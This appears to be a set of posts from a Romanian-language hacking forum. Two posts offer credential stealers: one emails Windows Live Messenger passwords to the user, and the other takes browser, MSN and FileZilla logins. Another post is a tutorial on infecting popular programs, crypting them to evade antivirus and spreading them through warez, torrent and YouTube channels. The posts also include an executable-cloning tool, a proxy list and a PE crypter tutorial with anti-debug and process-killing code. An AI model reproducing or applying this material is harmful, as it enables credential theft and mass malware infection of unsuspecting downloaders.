  14. File Cloner v1.0 Copy from one file to another: - Version Info - Icon - File Size (only take result when source size is bigger than dest. file size) - Date/time of last modification If you find any bug please report it to me! Tested on MS Windows XP and Windows 2003 Server. I am waiting for testing and comments. Sample pictures: - before clone: -after clone: Download: http://mo4x.ovh.org/file_cloner.zip Mirror: http://www.2shared.com/file/7104365/8e07a80b/file_cloner.html Regards, mo4x
  15. TGS msn stealer! by SqUeEzEr It's a MSN stealer with only 8,50KB of code UNCOMPRESSED (and the settings are even crypted xD) It emails you the stored passwords of Windows Live Messenger. [usage] You have to open Builder.exe and fill in your information and press patch. Stub.exe should be in the same folder. Be sure you use a valid GMAIL account, otherwise you will get a error message. Download: http://www.2shared.com/file/7104327/4650c23/Stealer.html
  16. Mate sucks... Baga si tu ceva care nu are legatura cu mate. Mai e pana sa inceapa scoala.
  17. 194.212.94.23:8000 212.113.5.2:80 212.96.165.178:3128 222.240.141.4:8080 218.56.64.210:3128 200.165.90.110:8080 201.89.168.155:8080 201.91.0.9:3128 202.116.160.89:80 202.131.94.58:808 200.74.156.108:8080 202.63.97.35:8080 210.51.184.62:80 222.124.194.228:8080 222.124.2.106:8080 222.127.147.83:8080 60.191.241.38:8088 217.150.32.86:80 61.147.120.247:8080 58.68.125.75:80 61.186.94.152:3128 81.174.70.141:32123 80.249.185.2:3128 64.94.90.22:80 67.69.254.245:80 82.145.197.249:8080 211.239.124.67:6188 97.65.164.215:8080 200.168.234.1:8080 200.168.234.10:8080 200.168.234.99:8080 203.202.255.110:8080 211.90.22.106:8088 219.150.228.182:1080 195.139.235.200:80 222.215.71.132:1080 218.56.64.210:8080 202.129.189.66:8080 203.148.85.154:8080 203.160.1.103:80 203.160.1.121:80 203.160.1.94:80 64.76.22.106:8080 64.76.22.126:8080 220.227.250.254:8080 61.178.74.39:1080 67.69.254.250:80 79.127.144.2:8080 117.102.94.190:3128 203.199.215.115:8080 118.175.15.34:8080 219.93.178.162:3128 41.196.183.58:80 201.198.34.214:8080 189.89.16.82:3128 190.144.127.202:3128 201.53.63.168:3128 218.75.100.114:8080 202.133.82.120:8080 219.101.35.83:3128 64.76.22.108:8080 67.69.254.246:80 121.12.249.207:1080 203.112.205.194:80 74.53.185.131:8080 86.101.185.98:8080 74.86.24.76:3128 74.92.229.74:8089 81.180.75.142:8080 81.208.114.227:8080 114.127.246.36:80 195.229.62.157:8080 210.5.71.130:8080 211.162.78.178:80 146.83.8.31:8080 148.75.13.143:8080 202.131.98.165:80 202.148.31.170:3126 196.213.208.150:80 202.44.4.85:8081 200.249.150.55:3128 200.41.230.105:3128
  18. Make your owner PE Protector Part 1: Your first EXE Protector Download source files - 128 Kb Download demo project - 100 Kb Preface This article was written to provide the better understanding to people who do not have any experience in this field. I am not going to describe about PE structure, so I think it was explained enough in Matt Pietrek's articles in MSDN. I strongly recommend to read his article before continuing to read this article if you don't have any previous experience with PE structure. You could find useful the relevant reference link at the end of article. This article will appear in three parts: Your first EXE Protector This part will describe how to make a powerful EXE protector and packer by using Visual C++ Win32 Programming. Support OCX, DLL, and SCR This part will introduce to include other PE type in additional to EXE file type. It will explain some tricks which you should know for OCX and DLL protecting. Use Cryptography API This part will demonstrate how to use Microsoft Cryptography API function to encrypt and decrypt PE section information. This article contains yoda's protector source from version 1.01 to 1.03. It is first time people can look at its source after six month of appearance on web. It is based on [6] yoda's Crypter assembly source by Danilo Bzdok and compression source from [7] UPX library by Markus F.X.J. Oberhumer & Laszlo Molnar and [9] aPLib compression library by Joergen Ibsen. Thus, we should appreciate them for helping me to create this tool. I also should be grateful to people for trying and testing it on different windows version around the world. I think this article will be a small present to all people who involve and assist to make yoda's protector. 
Contents Introduction A short aspect about PE Structure Open PE files Verify if PE file is valid Make Extra Section Pack and Crypt Sections Built Import Table Directory Reload Import Table and API Redirection Anti-debug methods Eliminate unnecessary data Sample code Conclusion References Introduction The Portable Executable format is the standard executable format of the Microsoft Windows NT® family of operating systems. It holds the program's code, data and resources together with the information needed to import dynamic-link libraries. With a little assembly knowledge it can be modified using powerful debuggers such as OllyDbg or SoftICE, and that costs software companies revenue from their products. This is why they buy tools such as EXE protectors to make illegal copying harder. My idea is: what would happen if everyone had their own EXE protector? A cracker would then face a different protector, using different methods, every time. Thus, I think each of us can have their own EXE protector. (Keep in mind that a protector only raises the cost of analysis; it cannot prevent it. The protected sections must be decrypted in memory before they run, so a patient reverser with a debugger or a memory dump recovers the original code — the anti-debug section below slows that down, it does not stop it.) A short aspect about PE Structure A Portable Executable carries three groups of information: MS-DOS information, Windows NT information and sections. The Windows operating system uses this information to allocate memory, import dynamic-link libraries and execute the code. Table-1 — layout of a PE file: MS-DOS information: IMAGE_DOS_HEADER, MS-DOS Stub Program. Windows NT information: PE Signature ("PE"), IMAGE_FILE_HEADER, IMAGE_OPTIONAL_HEADER. Sections information: IMAGE_SECTION_HEADER[0] ... IMAGE_SECTION_HEADER[n], SECTION[0] ... SECTION[n]. You can find more about the PE file format in [1] "Microsoft Portable Executable and Common Object File Format Specification". Matt Pietrek explains it thoroughly in [2] "Peering Inside the PE: A Tour of the Win32 Portable Executable File Format", and [3a/b] "An In-Depth Look into the Win32 Portable Executable File Format". Moreover, PEview [4] by Wayne J. Radburn will help you explore every aspect of the PE file format. 
http://www.programmersheaven.com/articles/Ashkbiz/peprotector1/peview.gifFigure-1 There are all requirement data structures for PE file format in included <winnt.h> file inside your Visual C++. IMAGE_DOS_HEADER, IMAGE_NT_HEADERS, IMAGE_SECTION_HEADER structures represent all you need to work with PE file format. The relevant information for these structures could be found in [5] MSDN library. Open PE files We have to load PE file format to memory for working with its information. Some Windows API function will help us do it very easy: ''CreateFile(), GetFileSize(), GlobalAlloc(), ReadFile(), CloseHandle()''. I make a class to work with PE files. It helps me to open files and put DOS header, NT headers, Section Headers, and Sections into separate places in memory and then rebuild all as form as new PE files. class PEStructure { private: DWORD ReservedHeaderSize; DWORD ReservedHeaderRO; public: DWORD dwRO_first_section; IMAGE_DOS_HEADER image_dos_header; char *reservedheader; IMAGE_NT_HEADERS image_nt_headers; IMAGE_SECTION_HEADER image_section_header[MAX_SECTION_NUM]; char *image_section[MAX_SECTION_NUM]; void OpenFileName(char* FileName); void UpdateHeaders(BOOL bSaveAndValidate); void UpdateHeadersSections(BOOL bSaveAndValidate); void Free(); }; ''OpenFileName()'' will open PE files to place in ''image_dos_header, reservedheader, image_nt_headers, image_section_header[]'', and ''image_section[]''. All PE structures will abstract by this function in my tool. 
void PEStructure::OpenFileName(char* FileName) { hFile=CreateFile(FileName, GENERIC_READ, FILE_SHARE_WRITE | FILE_SHARE_READ, NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL); if(hFile==INVALID_HANDLE_VALUE) { ShowErr(FileErr); return; } dwFsize=GetFileSize(hFile,0); if(dwFsize == 0) { CloseHandle(hFile); ShowErr(FsizeErr); return; } dwOutPutSize=dwFsize+IT_SIZE+DEPACKER_CODE_SIZE+ALIGN_CORRECTION; pMem=(char*)GlobalAlloc(GMEM_FIXED | GMEM_ZEROINIT,dwOutPutSize); if(pMem == NULL) { CloseHandle(hFile); ShowErr(MemErr); return; } ReadFile(hFile,pMem,dwFsize,&dwBytesRead,NULL); CloseHandle(hFile); CopyMemory(&image_dos_header,pMem,sizeof(IMAGE_DOS_HEADER)); ReservedHeaderRO=sizeof(IMAGE_DOS_HEADER); ReservedHeaderSize=image_dos_header.e_lfanew-sizeof(IMAGE_DOS_HEADER); reservedheader=new TCHAR[ReservedHeaderSize]; CopyMemory(&image_nt_headers, pMem+image_dos_header.e_lfanew, sizeof(IMAGE_NT_HEADERS)); dwRO_first_section = image_dos_header.e_lfanew + sizeof(IMAGE_NT_HEADERS); UpdateHeadersSections(TRUE); } Verify if PE file is valid It is important to verify file is a Win32 Portable Executable file by checking ''e_magic'' of ''image_dos_header'' and Signature of ''image_nt_header'' to prevent of unpredictable fault. if(PEfile.image_dos_header.e_magic!='ZM') { GlobalFree(pMem); CloseHandle(hFile); if(MakeBackup) DeleteFile(szFnameBackup); ShowErr(PEErr); return; } if(PEfile.image_nt_headers.Signature!='EP') { GlobalFree(pMem); CloseHandle(hFile); if(MakeBackup) DeleteFile(szFnameBackup); ShowErr(PEErr); return; } Make Extra Section There is a trick inside yoda's Protector to create extra section for protection and unpacking purposes. Visual C++ aids it to make this extra part without using of assembler compiler and linker. If you look at PE_LOADER_CODE() subroutine inside the ''CryptStuff.cpp'' you will find what I am talking about. This is same as the method that was done by Danilo Bzdok in his [6] yoda's Crypter. 
Of course, he did it entirely in assembly language with MASM32, without any high-level language. I wrote ''GetFunctionRVA(), GetFunctionSize()'' and ''CopyFunction()'' to lift the machine code out of PE_LOADER_CODE() and use it to create an additional section in the target PE file. DWORD GetFunctionRVA(void* FuncName) { void *_tempFuncName=FuncName; char *ptempFuncName=PCHAR(_tempFuncName); DWORD _jmpdwRVA,dwRVA; CopyMemory(&_jmpdwRVA,ptempFuncName+1,4); dwRVA=DWORD(ptempFuncName)+_jmpdwRVA+5; return(dwRVA); } DWORD GetFunctionSize(void* FuncName) { DWORD dwRVA=GetFunctionRVA(FuncName); char* pFuncBody=PCHAR(dwRVA); UCHAR _temp; bool notEnd=TRUE; char *DepackerCodeEnd=new TCHAR[10]; DWORD l=0; do { CopyMemory(&_temp,pFuncBody+l,1); if(_temp==0xC3) { CopyMemory(DepackerCodeEnd,pFuncBody+l+0x01,10); DepackerCodeEnd[9]=0x00; if(strcmp(DepackerCodeEnd,"ETGXZKATZ")==0) { notEnd=FALSE; } } l++; }while(notEnd); return(l); } ''GetFunctionRVA()'' locates the address of the target subroutine for ''GetFunctionSize()'' and ''CopyFunction()''. Note how it does so: it reads the four bytes following the first byte at the function's address and adds 5, i.e. it decodes a 5-byte relative jmp (E9 rel32). It therefore only works when the function pointer lands on a jump thunk in front of the body (the thunks emitted by incremental linking are one such case — confirm this for your build settings); with a pointer straight to the body it yields a meaningless address. ''GetFunctionSize()'' returns the size of the target routine, counted up to and including the RET but excluding the marker, for CopyFunction() to use. It scans byte by byte for a 0xC3 followed by the keyword ("ETGXZKATZ"); the scan has no upper bound, so if the marker is missing or altered (for example by the optimizer) the loop reads past the end of the function until it happens to find a match or faults. (The DepackerCodeEnd buffer is also never freed.) Finally, ''CopyFunction()'' copies the whole body of the PE_LOADER_CODE() subroutine so it can be placed in the packed PE file. 
char* CopyFunction(void* FuncName) { DWORD dwRVA=GetFunctionRVA(FuncName); DWORD dwSize=GetFunctionSize(FuncName); char* pFuncBody=PCHAR(dwRVA); char* filebuff=new TCHAR[dwSize+1]; CopyMemory(filebuff,pFuncBody,dwSize); return(filebuff); } The following code shows the helpers in use (note that the ''new TCHAR[DEPACKER_CODE_SIZE]'' buffer is overwritten on the very next line by the buffer CopyFunction() allocates itself, so the first allocation leaks): char *pDepackerCode; DWORD DEPACKER_CODE_SIZE; : DEPACKER_CODE_SIZE=GetFunctionSize(PE_LOADER_CODE); pDepackerCode=new TCHAR[DEPACKER_CODE_SIZE]; pDepackerCode=CopyFunction(PE_LOADER_CODE); : void PE_LOADER_CODE() { _asm { //-------------------------------------------------- //---------- START OF THE PE LOADER CODE ----------- DepackerCode: : : : DepackerCodeEND: RET //"ETGXZKATZ" <<-- KEY WORD INC EBP //'E' PUSH ESP //'T' INC EDI //'G' POP EAX //'X' POP EDX //'Z' DEC EBX //'K' INC ECX //'A' PUSH ESP //'T' POP EDX //'Z' } } Pack and Crypt Sections The UPX compressor source [7] is one option for packing the sections of PE files. I use the [8] LZO data compression library by Markus F.X.J. Oberhumer to pack the code and data sections. The polymorphic encryption and decryption method [6] by Danilo Bzdok is simple and, with some modification in C++, adequate for scrambling PE sections, as you can see in ''EncryptBuff()'' and ''DecryptBuff()'' in ''PER.CPP''. Be clear about what this buys: it is obfuscation, not cryptography. The decryption routine is written into the loader code itself (the CopyMemory() of SecDecryptBuff into pDepackerCode below), so the sections are only hidden from static inspection; whoever runs the loader under a debugger or dumps the process afterwards has the plaintext sections. (Moving to the Microsoft Cryptography API in Part 3 does not change this as long as the key lives inside the same file.) This protector keeps the sections in separately allocated parts of memory, then packs and encrypts them with CompressPE() and CryptPE(). (The listing below spells the size constant both ''sEC_PER_SIZE'' and ''SEC_PER_SIZE''; they must be the same identifier.) //------ ENCRYPT THE SECTIONS ----- // generate PER PEfile.UpdateHeadersSections(TRUE); SecEncryptBuff=new TCHAR[sEC_PER_SIZE]; SecDecryptBuff=new TCHAR[sEC_PER_SIZE]; MakePER(SecEncryptBuff,SecDecryptBuff,SEC_PER_SIZE); CopyMemory(pDepackerCode+dwRO_SEC_DECRYPT, SecDecryptBuff, SEC_PER_SIZE); // encrypt ! 
CompressPE(pMem); CryptPE(pMem); RemoveSectionNames(pMem); newsection.Misc.VirtualSize=DepackCodeVirtualSize+0x2000; PEfile.image_section_header[PEfile.image_nt_headers.FileHeader.NumberOfSections-1] .Misc.VirtualSize = newsection.Misc.VirtualSize; PEfile.UpdateHeadersSections(FALSE); //--------------------------------- The LZO data compression library [8] ships compressor source in C++ and decompressor source in both C++ and assembly, so we have everything needed to pack in a high-level language and unpack in a low-level one. I use ''lzo1x_999_compress_level()'' from the LZO library to compress the sections inside ''CompressPE()'' and the assembly routine ''lzo1f_decompress_asm_fast_safe()'' to decompress them inside ''_DecompressPE()'' in the assembly source of ''PE_LOADER_CODE()''. (Note that these two names belong to different LZO formats — LZO1X and LZO1F — which are not interchangeable; one of them must be a typo, and the decompressor has to match the compressor's algorithm.) It is important to respect image_nt_headers.OptionalHeader.SectionAlignment and image_nt_headers.OptionalHeader.FileAlignment, otherwise Windows versions newer than Windows 98 reject the output as an invalid Win32 file. The fields of each IMAGE_SECTION_HEADER must be rounded to the file alignment and section alignment. I use the ''UpdateHeadersSections()'' function to retrieve and rebuild all of the PE file structures. Two caveats before reusing it: first, in the listing below the ''[i]'' index on ''image_section'' and ''image_section_header'' has been lost in transcription — read ''image_section_header[i]'' and ''image_section[i]''. Second, none of the listings in this article bound the values they read from the input file: OpenFileName() uses e_lfanew as an offset into pMem (as listed, before the 'MZ'/'PE' check runs), ReservedHeaderSize is e_lfanew minus sizeof(IMAGE_DOS_HEADER) with only its sign bit tested, NumberOfSections is never compared with MAX_SECTION_NUM, and UpdateHeadersSections() copies SizeOfRawData bytes from pMem + PointerToRawData without checking either value against dwFsize. A malformed or hostile PE file therefore makes the protector read (and write) out of bounds; a real tool must validate every offset and size against the file size before using it. 
void PEStructure::UpdateHeadersSections(BOOL bSaveAndValidate) { DWORD i; if(bSaveAndValidate)//TRUE = data is being retrieved { DWORD SectionNum = PEfile.image_nt_headers .FileHeader.NumberOfSections; CopyMemory(&image_dos_header,pMem,sizeof(IMAGE_DOS_HEADER)); ReservedHeaderSize = image_dos_header.e_lfanew - sizeof(IMAGE_DOS_HEADER); if((ReservedHeaderSize&0x80000000)==0x00000000) { CopyMemory(reservedheader, pMem+ReservedHeaderRO, ReservedHeaderSize); } CopyMemory(&image_nt_headers, pMem+image_dos_header.e_lfanew, sizeof(IMAGE_NT_HEADERS)); dwRO_first_section = image_dos_header.e_lfanew + sizeof(IMAGE_NT_HEADERS); CopyMemory(&image_section_header, pMem+dwRO_first_section, SectionNum*sizeof(IMAGE_SECTION_HEADER)); for(i=0;i< SectionNum;i++) { image_section = (char*)GlobalAlloc( GMEM_FIXED | GMEM_ZEROINIT, PEAlign(image_section_header.SizeOfRawData, PEfile.image_nt_headers.OptionalHeader.FileAlignment)); CopyMemory(image_section, pMem + image_section_header.PointerToRawData, image_section_header.SizeOfRawData); } } else//FALSE = data is being initialized { DWORD SectionNum = PEfile.image_nt_headers .FileHeader.NumberOfSections; CopyMemory(pMem, &image_dos_header,sizeof(IMAGE_DOS_HEADER)); ReservedHeaderSize=image_dos_header.e_lfanew - sizeof(IMAGE_DOS_HEADER); if((ReservedHeaderSize&0x80000000)==0x00000000) { CopyMemory(pMem + ReservedHeaderRO, reservedheader, ReservedHeaderSize); } CopyMemory(pMem+image_dos_header.e_lfanew, &image_nt_headers, sizeof(IMAGE_NT_HEADERS)); dwRO_first_section = image_dos_header.e_lfanew + sizeof(IMAGE_NT_HEADERS); CopyMemory(pMem+dwRO_first_section, &image_section_header, SectionNum*sizeof(IMAGE_SECTION_HEADER)); for(i=0;i< SectionNum;i++) { CopyMemory(pMem+image_section_header.PointerToRawData, image_section, image_section_header.SizeOfRawData); } } } Built Import Table Directory PE unpack section need to import two essential API functions to load dynamically all other API functions in Run-time load. 
LoadLibraryA() and GetProcAddress() from Kernel32.dll are the two vital functions for importing every other API function with a few tricks. AssembleIT() is reserved for this task. We change the import table address and size so that they point to a new import table directory inside the extra section. To get the old import table back, the loader reloads and rebuilds the import table directory in the next step, before running the program code. The loader section uses LoadLibraryA() and GetProcAddress() to look up the relative virtual addresses of the functions imported from dynamic-link libraries. Table-2 — the new import table: Import Table Address -> "Kernel32.dll", 0x00 LoadLibrary_RVA GetProcAddress_RVA 0x00,0x00 LoadLibrary_RVA -> 0x00,0x00,"LoadLibraryA" GetProcAddress_RVA -> 0x00,0x00,"GetProcAddress" (the original table read "GetProcessAddress"; Kernel32.dll has no export by that name and an import by name would fail — the export is GetProcAddress, as the text above correctly says). Reload Import Table and API Redirection It is important to protect the import table directory from reverse engineering. Danilo Bzdok used techniques that destroy the import thunk data and encrypt the import information in [6] yoda's Crypter; the loader code section rebuilds that information at run time. I applied his methods in my PE Protector, bringing part of the code to C and keeping the rest in assembly. ''ProcessOrgIT()'' provides everything needed for this. In the loader section, the ''INIT_IMPORT_TABLE()'' routine implements the API redirection and the import table rebuild. Anti-debug methods A PE protector should be able to detect that the program is being debugged and refuse to continue. OllyDbg and SoftICE are two important debuggers, and plug-ins for them bypass many of the tricks that are meant to stop them. Still, I will introduce some simple detection methods. Be aware that none of them has any effect against the recent plug-ins for those debuggers: each check below boils down to a single conditional branch in the loader, which a reverser patches or a plug-in hides. Treat them as a speed bump, not a barrier. 1. IsDebuggerPresent Windows API: ''IsDebuggerPresent()'' returns a non-zero value whenever the current process is running in the context of a debugger. 2. 
SoftICE detection: It can find SoftICE debugger by check if ''NTICE'' driver in windows NT and ''SICE'' driver in windows 98 are active . if(CreateFile( "\\\\.\\NTICE", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)!=INVALID_HANDLE_VALUE) { There is SoftICE NT on your system; } if(CreateFile( "\\\\.\\SICE", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL)!=INVALID_HANDLE_VALUE) { There is SoftICE98 on your system; } 3. Probe Processes: Some time it needs to search for specific process or isolates to specially process. It was demonstrated how finding parent process and check if it is ''EXPLORER.EXE'' and killing all parent process except Explorer windows in sample source code. There are both C++ and assembly code inside ''CryptStuff.CPP'' to illuminate this task. void GetFileNameFromPath(char* szSource) { char *szTemp=strrchr(szSource,'\\'); if(szTemp!=NULL) { szTemp++; DWORD l=DWORD(strlen(szTemp))+1; CopyMemory(szSource,szTemp,l); } } void AntiDebug() { char lpszSystemInfo[MAX_PATH]; HANDLE hSnapshot=NULL; DWORD PID_child; DWORD PID_parent,PID_explorer; HANDLE hh_parnet = NULL; PROCESSENTRY32 pe32 = {0}; pe32.dwSize = sizeof(PROCESSENTRY32);//0x128; PID_child=GetCurrentProcessId();//getpid(); hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); if (Process32First(hSnapshot, &pe32)) { while (Process32Next(hSnapshot, &pe32)) { GetFileNameFromPath(pe32.szExeFile); CharUpperBuff(pe32.szExeFile,strlen(pe32.szExeFile)); if(strcmp(pe32.szExeFile,"EXPLORER.EXE")==0) { PID_explorer=pe32.th32ProcessID; } if(pe32.th32ProcessID==PID_child) { PID_parent=pe32.th32ParentProcessID; } } } if(PID_parent!=PID_explorer) { hh_parnet= OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID_parent); TerminateProcess(hh_parnet, 0); } else { MODULEENTRY32 me32 = {0}; me32.dwSize = sizeof(MODULEENTRY32); hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPMODULE, 
PID_explorer); if (Module32First(hSnapshot, &me32)) { do { if(PID_explorer==me32.th32ProcessID) { GetWindowsDirectory(lpszSystemInfo, MAX_PATH+1); strcat(lpszSystemInfo,"\\"); strcat(lpszSystemInfo,"EXPLORER.EXE"); CharUpperBuff(me32.szExePath, strlen(me32.szExePath)); if(strncmp(me32.szExePath, lpszSystemInfo, strlen(lpszSystemInfo))) { GetFileNameFromPath(me32.szExePath); if(strcmp(me32.szExePath, "EXPLORER.EXE")==0) { hh_parnet= OpenProcess(PROCESS_ALL_ACCESS, TRUE, PID_explorer); TerminateProcess(hh_parnet, 0); } } } }while (Module32Next(hSnapshot, &me32)); } } } This code will not work under Windows NT 4.0 because ''CreateToolhelp32Snapshot(), Process32First(), Process32Next(), Module32First(), Module32Next()'' are absent there. All of them can, however, be rebuilt on top of the undocumented API in ''NTDLL.DLL''; see [10] 'Windows NT (2000) Native API reference' by Gary Nebbett. A few things to fix before reusing the AntiDebug() listing: PID_parent and PID_explorer are never initialised and are assigned only when the snapshot walk finds a matching entry, so on a miss the final comparison reads indeterminate values; the walk discards the entry returned by Process32First() and starts at Process32Next(); lpszSystemInfo is char[MAX_PATH] but GetWindowsDirectory() is told it holds MAX_PATH+1 characters, and two unchecked strcat() calls follow; neither snapshot handle nor the opened process handles are ever closed; and the "parent is not Explorer" branch terminates whatever the parent happens to be — a command prompt, an installer, a launcher — not just a debugger, which makes it a usability and, with PROCESS_ALL_ACCESS, a safety problem rather than a protection. It also only catches a debugger that launched the process; one that attaches to the already-running process is not its parent and is never seen. Furthermore, I recommend using [11] Process Explorer by Mark Russinovich to explore all running processes on your system; it helps to understand them better. http://www.programmersheaven.com/articles/Ashkbiz/peprotector1/procexp.gifFigure-2 Eliminate unnecessary data Sometimes you want to strip all unnecessary data: debug information, the relocation section, a shortened DOS header and the MS-DOS stub program. Keep these options in your PE protector, but with some care. For instance, an EXE that is loaded at its preferred ImageBase never uses its relocation section, but the section is essential for OLE/ActiveX controls and dynamic-link libraries, which are routinely rebased — and an EXE without relocations cannot be rebased either, so it cannot take part in address-space layout randomization (/DYNAMICBASE) on later Windows versions. Sample code The project compiles with Visual C++ .NET 2003 and does not require any extra tools. It works under all Windows versions except Windows NT 4.0 and Windows 95. Conclusion This article and its source are meant as an introduction to PE protector tools and a demonstration of how they work. I hope it fills the gap left by the scarcity of this kind of topic and tooling in the open-source world. 
References [1] "Microsoft Portable Executable and Common Object File Format Specification", Microsoft Corporation, Revision 6.0, February 1999 [2] "Peering Inside the PE: A Tour of the Win32 Portable Executable File Format", Matt Pietrek, MSDN Library, March 1994 [3a] "An In-Depth Look into the Win32 Portable Executable File Format", part 1, Matt Pietrek, MSDN Magazine, February 2002 [3b] "An In-Depth Look into the Win32 Portable Executable File Format", part 2, Matt Pietrek, MSDN Magazine, March 2002 [4] PEview Version 0.67, Wayne J. Radburn [5] MSDN Library, Microsoft Corporation, April 2003 [6] yoda's Crypter, Danilo Bzdok [7] UPX, the Ultimate Packer for eXecutables, Markus F.X.J. Oberhumer & Laszlo Molnar [8] LZO real-time data compression library, Markus F.X.J. Oberhumer [9] aPLib compression library, Joergen Ibsen [10] "Windows NT (2000) Native API reference", Gary Nebbett [11] Process Explorer, Mark Russinovich
  19. Steals: Firefox 3.x MSN +8.x IE 7.x Filezilla Download: http://www.2shared.com/file/7104013/2a6325a0/SeabraStealer01.html
  20. Repet: Nu garantez ca nu sunt infectate. De fapt chiar banuiesc ca unele sunt infectate. In plus cred ca sunt foarte slabe sanse sa gasiti ceva care sa functioneze bine.
  21. Sa vad ce reusesc, mai intai vreau sa termin un tutorial de care m-am apucat, dar cred ca va dura ceva. Apoi va ajut cu orice, nu e nevoie sa fiu membru, nu ma ocup cu asa ceva, dar daca va pot ajuta va ajut cu placere.
  22. http://bahoi.ro/?p=139
  23. Uploadati fisierele pe un host, setati permisiunile folderului in care se afla astfel incat utilizatorul sub care ruleaza serverul web sa poata scrie in el (777 merge, dar inseamna ca orice alt cont de pe acel host poate citi si modifica fisierele de log; pe un host partajat folositi drepturi mai restrictive), intrati pe pagina HTML, apasati taste la intamplare, apoi vedeti in acel folder daca s-a creat un fisier cu IP-ul vostru.
  24. Nytro

    Salutare

    Daca nu vrei ban si pe acesta, uita-te la data ultimului post inainte de a posta.
  25. Spreading By: Beaver What Is Spreading? Spreading Is The Way Your Program/Trojan/ETC Circulates Around The Internet. This Means That People At Some Point People Spread It For. This Is Your Goal, To Put Something Out There That Is Not Wide Spread And Is Hard To Find. It Is All About Finding That Niche (A Targeted Group Of People, Like Gamers) That Want Something, But Do Not Have It Yet. When This Is Done, People Will Download It And Put It On Their Site For Download or Put It On A Torrent. Getting Started 1. Finding The Right Program This Will Be The Hardest Part. Finding Out What Is Wanted At A Certain Point In Time Is Hard. Find Out What Niche You Want To Go After, For Example If You Are Going After Gamers, But Not Just Gamers, Let’s Say Gamers That Use Steam. You Have A Couple Of Options. One Is You Can Look Around The Net That Will Focus Directly On Steam Gamers (Screen Recorders, Voice Changers, etc.). Another Is You Can Make Your Own Program; This Will Insure That There Is Nothing Else Like It, But Make Sure That The Program Is Useful And It Works. After You Think You Have Found The Right Program, Upload It To Some Warez (Media Sharing) Sites, Like Warez-BB.org And Some Torrent (Peer-To-Peer Sharing) Sites, Like ThePirateBay.org To See How Many Downloads You Can Get In A Day. If The Number Is Below 25 Try Another Program. While 25 Is Decent Number For Beginners, It Is Just Not Enough To Make A Big Impact On The Net. Stay Away From Large Programs (Over 75 MB). 2. Infecting The Program This Will Either Require Money Or Programming Knowledge. If You Choose To Infect The Program That You Found You Make Sure What Ever You Are Infecting It From Is FUD (Fully Undetectable To Anti-Virus Software). To Achieve This You Will Need A Crypter (A Program That Changes The Programs Code To Make It Look It Different When Scanned By Anti – Virus Software). 
You Can Either Learn To Code One Of These, Which Is The Cheaper Way, But Is Time Consuming Or You Can Buy One From Many Of The Hacking Forums Out There, Like Ukn0wn.ws. They Can Cost Anywhere From $25 To $80. After You Infect The Program Run It Through The Crpyter To Make It FUD. Where To Spread? This Is The Big Question. Knowing Where To Spread You Just Have To Go With Your Instinct, But Below You Will Find A List Of Sites And Site Types I Found Useful In My Spreading. • Warez Sites o Http://www.warez-bb.org o Http://www.Project-W.org o Bookmark Any Warez Sites You Come Across • Torrents o Http://www.ThePirateBay.org o Http://www.MiniNova.org o Http://www.Demonoid.com o Private Torrent Sites Are The Best, Because People Are Trustworthy On There • Forums (Based On Your Niche) o I Cannot Post Any Links, Because Depending On What Type Of Niche You Chose You Will Need To Find Those Types Of Forums. • Youtube o Make A Short Video, No More Than 30 Seconds That Has The Description (Read On That Below). Make Sure To Have Appropriate Music. After The Video Is Uploaded And Processed Submit The URL To Things Like StumbleUpon (Link Sharing) And Digg.com (Social News Site). What Do I Put? The Description Is Where It Makes Or Breaks Your Spreading. Make Sure You Always Use The Same Description. This Allows Easy Copy/Paste For The People That Will Post The Program Elsewhere. • Take At Least 1 Screen Shot Of The Program. Upload That To A Good Image Hosting Site, Like ww.TinyPic.com • Choose A Good File Host Where You Can Track The Number Of Downloads You Are Getting. If You Use Rapidshare.com Then Get A Legit Account. I Use Free Online Storage - File Qube, It Is Free And It Tracks Page Views and Downloads, And It Accepts A Lot Of File Types. • Write Out A Well Thought Out Description That Talks About How The Program Works, What The Features Are, ETC. 
• When Your Infected Is FUD, Upload It To NoVirusThanks - Free Online Virus & Malware Scan Service Making Sure To Check “Do Not Distribute The Sample”. This Site Scans Your File With All Of The Major Anti – Virus Software. That Check Box Makes Sure They Do Not Send Their Findings To The Anti- Virus Companies, This Means Your Program Will Stay FUD Longer. After It Is Done Grab The BB Code And HTML Code. • Keep Your Descriptions For Later Use. Keep The Description, One For Forums/Warez Sites That Has The NoVirusThanks BB Code, Download Link For Your Program, And The Links Or BB Code For Your Screen Shot(s) And One For Sites That Don’t Use BB Code, That Has The HTML Code From NoVirusThanks, Download Link For Your Program, And The Links Or BB Code For Your Screen Shot(s). Syndication Syndication Means That Others That Have Downloaded Your Program Are Posting It On Other Sites For You. This Means That Your Spreading Has Been A Major Success And You Should Be Happy. This Means You Do Not Have To Try As Hard To Get Download, Because Others Are Doing The Spreading For You. This Has Been A Beaver Tutorial. If You Want To Post This On Other Site Please Leave The Following. Written By Beaver For… http://www.Beaver.WS uNkn0wn.ws - Index page